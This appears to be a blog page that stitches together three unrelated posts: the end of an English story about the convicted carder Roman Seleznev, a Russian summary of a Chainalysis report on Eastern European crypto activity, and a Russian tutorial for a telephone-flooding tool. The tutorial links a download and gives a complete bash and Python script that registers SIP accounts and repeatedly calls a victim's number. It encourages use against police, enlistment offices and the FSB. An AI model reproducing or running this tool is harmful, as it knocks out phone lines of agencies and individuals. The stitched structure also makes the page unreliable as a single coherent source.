The ‘Uncle Andrei’ scenario worked very well – it infuriated not only the agents, but also the judge. The defense filed a notice to withdraw from the case due to disagreements with the client before the hearings. The meeting was postponed from May 2015 to November 2015. The case postponement resulted in additional costs due to the fact that the witnesses in the case had already flown to the Seattle court from Sri Lanka, Honolulu and Chicago.

Seleznev wrote a handwritten letter to the court before the verdict, in which he briefly recounted his biography, mentioned about a difficult childhood and how he tried to earn money and set his foot on a slippery slope of carding.

‘I tried to find a job on the Internet and things started to go downhill. I chose the wrong path’.

But it was already too late. Just like before the terrorist attack in Marrakesh, when they told him: ‘It’s a bad idea’. But he had already made his choice and there was no turning back.

THE END

Seleznev was sentenced in April 2017, when the story of the alleged interference of Russian hackers in the US presidential election was on everyone’s mind for several months. He was given 27 years – the longest sentence given to a cybercriminal in the US ever. ‘I am a political prisoner. I am a tool for the US government’, – Seleznev said after the verdict. ‘They want to send a signal to the whole world using me as a pawn. Given my head injury, today’s sentence could be considered a death sentence’.

His father called the decision ‘the verdict of cannibals’. In September 2017, Seleznev pleaded guilty to two more cases – in which the losses amounted to about $52 million.

P.S. If you are faced with a choice right now, think carefully and look around. Universe, God or matrix, or someone whom you believe in – they will definitely give you a sign. And no matter, what past you have behind you – your future is in your hands.

P.P.S. Now Roman Seleznev is in a specialized medical prison in North Carolina – FCI Butner Medium. He is in his cell all day round due to the epidemiological situation. He hopes for a pardon from Trump, or at least for the opportinuty that he will be allowed to live under guard outside of prison during the epidemic. His chances to survive are not great while being locked up. Current release date: 07/06/2037. If you want to cheer up a guy, write letters to him:

ROMAN SELEZNEV

Register Number: 04385-093

FCI Butner Medium II

P.O. BOX 1500

BUTNER, NC 27509
UNITED STATES OF AMERICA

P.P.P.S: Comments by Svetlana Smulskaya, Roman’s ex-wife:

Vlad, don’t write of that which you don’t know! By the way, I saved Roman’s life in Morocco and carried him after resuscitation! I washed him and cleaned up after him when he could hardly walk and after discharge I went with him to all the doctors! And it was my duty as a wife, which I performed! And the fact that Roma beat me when he recovered in front of Eva, he didn’t mention in the correspondence, no?! And when he beat me, I didn’t even fight back because I was afraid that I would accidentally hit the parts of the head, where were removed part of the skull. So, I endured.

Did’t you know, that he cheated on me when he flew to Moscow for months to see his one-armed dad?! Didn’t he say that he and Anton robbed my apartment and took everything out?! I didn’t run away, but left after the OFFICIAL divorce and division of property! I’m tired of threats that if I don’t give the child to him, then he will stuff me with drugs and hand me over to the hospital by means of money and connections and take Eva away. Is it fine?! I don’t think so.

I’ll tell you, if you don’t know … the property (two houses and 4 hotel rooms) in Bali – everything went to Roma. It was originally issued to me, but I gave a power of attorney and he re-registered everything for himself or his father in the process of divorce – I don’t remember exactly.

I understand that accusing women of villainy and commercialism is a trend, but what you wrote about me is a lie. It was hard to read. A coin always has two sides. And, hey, couldn’t you have chosen a better photo?! I look a fright on it: drunk and angry, ‘cause Roman pulled your beanpole for boobs in front of my eyes!

2022: To the moon? Активность криптовалютного рынка Восточной Европы, всплески уходящего года, вызванные войной между Россией и Украиной

А помнишь, как в начале года все ждали 2themoon? Биткоин по сотке? Ну или хотя бы по 70.

Потом нестабильность на фондовом рынке. Потом всех начала кошмарить Россия, сначала уронив биток почти на 10к своими заявлениями об объявлении его вне закона.

Потом началась война.

Но давайте посмотрим внимательно. Восточная Европа является пятым по величине криптовалютным рынком: с июля 2021 года по июнь 2022 года на нем будет получено 630,9 млрд долларов США. Это составляет чуть более 10% от общемировой активности транзакций.

Роль Восточной Европы в общей мировой криптоэкосистеме оставалась на удивление стабильной в течение последних нескольких лет, и обычно держась в районе 10%. В других регионах, напротив, наблюдалась большая волатильность.

В других исследованиях много внимания уделялось роли Восточной Европы в криптовалютной преступности – особенно России. В частности, в Восточной Европе исторически наблюдалось чрезмерное количество программ-вымогателей и отмывания денег с помощью криптовалют, причем последнее поддерживалось большой экосистемой рискованных криптовалютных предприятий. Некоторые из этих предприятий, такие как внебиржевая биржа Suex, даже попали под санкции Министерства финансов США в результате своей деятельности в 2021 году. Тем не менее, рискованная и незаконная деятельность все еще занимает видное место, когда мы рассматриваем деятельность на цепочке в Восточной Европе: На биржи с высоким уровнем риска – те, где отсутствуют или низкие требования к KYC – приходится 6,1% транзакционной активности в регионе, по сравнению с 1,2% в следующем по близости регионе. Фактически, если мы объединим адреса, связанные с рискованной и незаконной деятельностью, то увидим, что пользователи в Восточной Европе взаимодействуют с ними гораздо чаще, чем пользователи в других регионах.

Криптовалютный рынок (c) Chainalisys

Обратите внимание: деятельность по незаконным операциям относится к операциям, в которых один или несколько адресов контрагентов связаны с преступной организацией. Рискованная деятельность относится к операциям, в которых один или несколько адресов контрагентов связаны с рискованной организацией, например, биржей или сервисом с высоким уровнем риска, штаб-квартира которого находится в юрисдикции с высоким уровнем риска.

18,2% всей криптовалюты, полученной Восточной Европой, поступило с адресов, связанных с рискованной или незаконной деятельностью, что больше, чем в любом другом регионе.

Изменения рынка и роль криптовалют в российско-украинской войне

Конечно, самой большой новостью в Восточной Европе в прошлом году было вторжение России в Украину в феврале 2022 года и продолжение боевых действий. Война затронула практически все аспекты жизни двух стран, и криптовалюта не стала исключением.

Вскоре после начала войны США и ряд других стран начали вводить санкции против российских олигархов и других лиц, связанных с правительством Владимира Путина. Это, в сочетании с исторически сложившейся в России практикой использования криптовалюты как в законных, так и в незаконных целях, вызвало вопросы о том, будут ли россияне пытаться использовать криптовалюту для обхода санкций. Наше исследование показало, что криптовалютные рынки, скорее всего, недостаточно ликвидны, чтобы поддерживать массовое и систематическое уклонение от санкций. Учитывая это, а также то, что данный отчет посвящен внедрению криптовалют на низовом уровне, мы будем использовать данные о цепочке, чтобы проанализировать, как широкие слои населения обеих стран обратились к криптовалютам после начала войны, а не только богатые люди или те, на кого распространяются санкции.

В конце концов, война оказала серьезное экономическое воздействие на граждан обеих стран. В Украине наблюдается чрезвычайно высокая инфляция: в июльской статье New York Times говорится о 90%-ном росте стоимости топлива и 35%-ном росте стоимости продуктов питания. В России также наблюдалась высокая инфляция после вторжения, и она столкнулась с трудностями в международной торговле – в частности, с экспортом таких товаров, как нефть – из-за исключения из банковской сети SWIFT. Учитывая этот контекст, давайте посмотрим, как изменилось использование криптовалют в России и Украине с началом войны. Сразу же можно отметить, что в марте 2022 года, вскоре после начала войны 24 февраля, в обеих странах наблюдался первоначальный рост криптовалютных переводов.

Однако после этого тенденции расходятся. В России в последующие месяцы транзакции росли и сокращались в относительно узком диапазоне. В Украине, напротив, наблюдался устойчивый рост криптовалютных переводов с самого начала войны до июня 2022 года. Возможно, на криптовалютную активность российских пользователей повлияли ограничения, наложенные на них многими сервисами в ответ на вторжение.

Конечно, учитывая экономические проблемы, с которыми сталкиваются обе страны, рассмотрение транзакций в целом может оказаться не тем местом, где мы ожидали бы найти наиболее показательные тенденции. Большая часть этой транзакционной активности состоит из сделок между криптовалютами – в чрезвычайной ситуации или при потенциальной гиперинфляции ожидаемо, что люди будут больше сосредоточены на защите или перемещении своих фиатных активов. Это можно хотяб ы частично измерить, посмотрев на объем торгов, номинированных в российском рубле и украинской гривне, используя данные листа заявок двух бирж, принимающих эти валюты: Binance и LocalBitcoins.

(c) Chainalisys

Тенденция здесь наблюдается еще сильнее, особенно в марте, сразу после начала войны. В этом месяце объем торговли в украинских гривнах вырос на 121% (до 307 миллионов долларов), а объем торговли в российских рублях вырос на 35% (до 805 миллионов долларов). После этого объемы торговли обеих стран снижаются, то набирая в объемах, то снижаясь в августе; но так и не достигнув мартовских максимумов. Истинный масштаб этой активности, скорее всего, намного выше, чем приведенные выше цифры, так как эти данные получены только от двух бирж, принимающих фиатные валюты обеих стран. Но все равно данной информации достаточно, чтобы сделать выводы о направлении тенденций.

Данные были переданы Татьяне Дмитренко, высокопоставленному советнику Министерства финансов Украины и члену Целевой группы по цифровым активам Всемирного экономического форума, с целью прояснить, какие сценарии использования могли привести к всплеску торговли гривнами за криптовалюты. Она сослалась на валютный контроль, введенный украинским правительством. “В связи с введением военного положения в Украине, украинский Центральный банк ввел ограничения на наличные валютные операции, такие как покупка долларов или евро”, – сказала она. Вскоре после этого были также ограничены переводы валютных средств за границу – Дмитренко считает, что некоторые украинцы могли захотеть обменять свои гривны на криптовалюту в ответ на эти меры. Она также отметила, что эти меры валютного контроля были ослаблены в июле 2022 года, и в этот момент наблюдается спад торговли гривнами за криптовалюту.

Чтобы узнать больше об аналогичной деятельности в России, было проведено интервью с региональным экспертом по отмыванию денег, который работал с подразделениями финансовой разведки в Восточной Европе, а также с несколькими международными организациями. Хотя он попросил сохранить анонимность, однако дал разрешениек процитировать его слова о том, как интерпретировать эти данные в свете того, что он видел в России с начала войны.

“Главным вопросом не только для олигархов, но и для простых россиян стал вопрос: “Как вывести деньги из России?”, сообщил эксперт. “Многие начали искать новые места, где они могли бы обналичить свои криптовалюты”. Были названы ОАЭ и Турция в качестве стран, на которые полагались в прошлом. Также были отмечены Казахстан и Грузия как страны, которые могли бы удовлетворить возросший спрос на такие услуги после начала войны. Хотя эту активность трудно оценить количественно, использование криптовалютных сервисов из этих стран, обслуживающих в основном российских пользователей, может быть полезным косвенным показателем. Во всех четырех странах после начала войны в феврале наблюдался всплеск посещений российских криптовалютных сервисов, как показано на графике ниже.

(c) Chainalisys

Эксперт также рассказал нам о том, какую роль криптовалюта может сыграть в финансировании внешней торговли России после ее исключения из SWIFT. Национальный банк России недавно согласился легализовать использование криптовалюты для трансграничных платежей и международной торговли, и эксперт сообщил, что, по его мнению, некоторые российские компании уже начали осуществлять такие транзакции. “Вероятно, это уже происходит в малых и средних масштабах, но может стать более распространенным”. Этот эксперт назвал Китай и Иран в качестве возможных торговых партнеров в такой схеме, отметив, что последний уже начал эксперименты с криптовалютами для импорта. Он также пояснил, что стабильные монеты, скорее всего, будут предпочтительным средством обмена, поскольку они не подвержены волатильности цен таких активов, как биткоин. Данные Chainalysis.com свидетельствуют о том, что использование стейблкоинов в России действительно возросло с начала войны.

(c) Chainalisys

В январе стейблкоины составляли 42% объема транзакций на преимущественно российских сервисах. Эта доля резко возросла до 55% в феврале и 67% в марте после вторжения. Хотя часть этого роста может быть вызвана тем, что предприятия используют криптовалюту для международных транзакций, также вероятно, что часть роста вызвана тем, что обычные российские граждане торгуют стабильными монетами, чтобы защитить стоимость своих активов, как обсуждалось ранее.

Схема “криптовалюта за импорт” вызывает множество вопросов о том, как сделать санкции против России более эффективными 😉 Одна из областей, где криптовалюты также показали свою эффективность, – это пожертвования на нужды Украины. С начала войны пользователи криптовалют пожертвовали более 65 миллионов долларов на гуманитарную помощь, демонстрируя силу, которую криптовалюты могут иметь для объединения людей через границы в поддержку международных целей.

Информационный источник:

[https://blog.chainalysis.com/reports/eastern-europe-cryptocurrency-geography-report-2022-preview/?utm_campaign=Blog&utm_source=twitter&utm_medium=OrganicSocial]

Телефонный флуд. Как зафлудить телефон полиции или военкомата бесплатно

Думаешь ддосить можно только сайты? Но нет. Заебал судебный пристав? Звонят из военкомата? Приглашают в полицию? Решение есть. Скажи, что у них не работал телефон. Устроить это абсолютно не сложно. При помощи всего одного бесплатного аккаунта айпи телефонии, одноканальный или мобильный телефон можно разорвать звонками на Юнион Джэк. Ты сможешь заебать кого угодно, выбор за тобой.

Мы уже всё сделали. Для того, чтобы софт работал тебе нужно открыть бесплатный аккаунт на одном из великого множества SIP операторов и выяснить сколько одновременных исходящих потоков они предоставляют, подходят как российские так и заграничные.

В случае с атакой на стационарные и мобильные телефоны скрипт не будет расходовать деньги вообще. Суть работы скрипта заключается в том, что он в несколько потоков дозванивается на номер жертвы и тут же кладет трубку. И это один поток. Большинство обычных операторов телефонии разрешают 3 одновременных исходящих потока, а это значит, что пока один поток “отзвонил”, второй уже подключается и на подходе третий.

Тесты показали, что в случае с обычным русским оператором айпи телефонии, позволяющим 3 исходящих потока, мобильный телефон на время атаки делался непригодным к использованию.

20 аккаунтов (все заграницные, пусть чекисты знают откуда готовилось нападение; да, да, ёбаное мудачье, даже не на обычный народ, а именно на вас, мразей) с разным количеством исходящих потоков сделали абсолютно непригодным к использованию многоканальный телефон приёмной ФСБ по Москве и МО.

Мы специально максимально упростили код, все, что нужно это прописать данные аккаунта, установить Python3, библиотеку PyTwinkle (pip3 install pytwinkle) и запустить скрипт с номером жертвы. Хочешь многопоточности – да не вопрос, мы специально не заморачивались с усложнением кода, чтобы ты легче было понять принцип работы флудера. Просто поставь что нибудь типа screen и пускай себе скрипт в несколько потоков прямо из консоли. Сложнее и не надо.

Всё просто, как сибирский лапоть, которым и будут получать а-та-та российские “силовики”.

P.S. Мы за свободу слова, в целом, и кода, в частности. Именно поэтому мы предоставляем его в открытом виде. Однако, если мы отметим его использование против Украины, намекаем, что у нас есть куда более сложные его версии и терабайты логов, в котрых этого сипа – как говна. Звонить будут не только телефоны мусоров, но даже твоей кацапской мамы, бабушки и тещи.

Прописываешь настройки от своего SIP провайдера, сохраняешь, как fuckphone.sh запускаешь с номером жертвы. И абонент – уже не абонент и потихоньку переезжает в ад телефонных звонков.

Качаем: https://cybersec.org/files/fuck_phone.zip

#!/bin/bash
cd ~
mkdir .twinkle
cd .twinkle

cat <<EOF > twinkle.cfg
# USER
user_name=${SIP_USER}
user_domain=${SIP_SERVER}
user_display=${SIP_USER}
user_organization=
auth_realm=
auth_name=${SIP_USER}
auth_pass=${SIP_PASS}
auth_aka_op=00000000000000000000000000000000
auth_aka_amf=0000

# SIP SERVER
outbound_proxy=
all_requests_to_proxy=no
registrar=${SIP_SERVER}
register_at_startup=yes
registration_time=3600
reg_add_qvalue=no
reg_qvalue=1

# RTP AUDIO
codecs=speex-wb,speex-nb,g711a,g711u,gsm
ptime=20
out_far_end_codec_pref=yes
in_far_end_codec_pref=yes
speex_nb_payload_type=97
speex_wb_payload_type=98
speex_uwb_payload_type=99
speex_bit_rate_type=cbr
speex_dtx=no
speex_penh=yes
speex_quality=6
speex_complexity=3
speex_dsp_vad=yes
speex_dsp_agc=yes
speex_dsp_aec=no
speex_dsp_nrd=yes
speex_dsp_agc_level=20
ilbc_payload_type=96
ilbc_mode=30
g726_16_payload_type=102
g726_24_payload_type=103
g726_32_payload_type=104
g726_40_payload_type=105
g726_packing=rfc3551
dtmf_transport=auto
dtmf_payload_type=101
dtmf_duration=100
dtmf_pause=40
dtmf_volume=10

# SIP PROTOCOL
hold_variant=rfc3264
check_max_forwards=no
allow_missing_contact_reg=yes
registration_time_in_contact=yes
compact_headers=no
encode_multi_values_as_list=yes
use_domain_in_contact=no
allow_sdp_change=no
allow_redirection=yes
ask_user_to_redirect=yes
max_redirections=5
ext_100rel=supported
ext_replaces=yes
referee_hold=no
referrer_hold=yes
allow_refer=yes
ask_user_to_refer=yes
auto_refresh_refer_sub=no
attended_refer_to_aor=no
allow_xfer_consult_inprog=no
send_p_preferred_id=no

# Transport/NAT
sip_transport=auto
sip_transport_udp_threshold=1300
nat_public_ip=
stun_server=
persistent_tcp=yes
enable_nat_keepalive=no

# TIMERS
timer_noanswer=30
timer_nat_keepalive=30
timer_tcp_ping=30

# ADDRESS FORMAT
display_useronly_phone=yes
numerical_user_is_phone=no
remove_special_phone_symbols=yes
special_phone_symbols=-()/.
use_tel_uri_for_phone=no

# RING TONES
ringtone_file=
ringback_file=

# SCRIPTS
script_incoming_call=
script_in_call_answered=
script_in_call_failed=
script_outgoing_call=
script_out_call_answered=
script_out_call_failed=
script_local_release=
script_remote_release=

# NUMBER CONVERSION

# SECURITY
zrtp_enabled=no
zrtp_goclear_warning=yes
zrtp_sdp=yes
zrtp_send_if_supported=no

# MWI
mwi_sollicited=no
mwi_user=
mwi_server=
mwi_via_proxy=no
mwi_subscription_time=3600
mwi_vm_address=

# INSTANT MESSAGE
im_max_sessions=10
im_send_iscomposing=yes

# PRESENCE
pres_subscription_time=3600
pres_publication_time=3600
pres_publish_startup=yes

EOF


cat <<EOF > sip.py
#!/usr/bin/env python3
import time
import sys
import socket
import socks
from pytwinkle import Twinkle

#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050)
#socket.socket = socks.socksocket

target=sys.argv[1]

def loopcall():
    for x in range(0, 1000):
        mTP.call("sip:"+target+"@${SIP_SERVER}")
        time.sleep(5.1)
        mTP.bye()

def callback(event, *args):
    print(event)
    if event=="registration_succeeded":
        uri, expires = args
        print("registratiom succeeded, uri: %s, expires in %s seconds"%(uri, expires))
        loopcall()

    if event=="cancelled_call":
        line=args[0]
        print("call cancelled, line: %s"%(line))
        loopcall()

    if event=="answered_call":
        call=args[0]
        print("answered: %s"%(str(call)))
        mTP.bye()
        loopcall()

    if event=="ended_call":
        line=args[0]
        print("call ended, line: %s"%(line))
        loopcall()

mTP = Twinkle(callback)
mTP.run()

EOF


chmod 755 sip.py

sudo ./sip.py ${TARGET}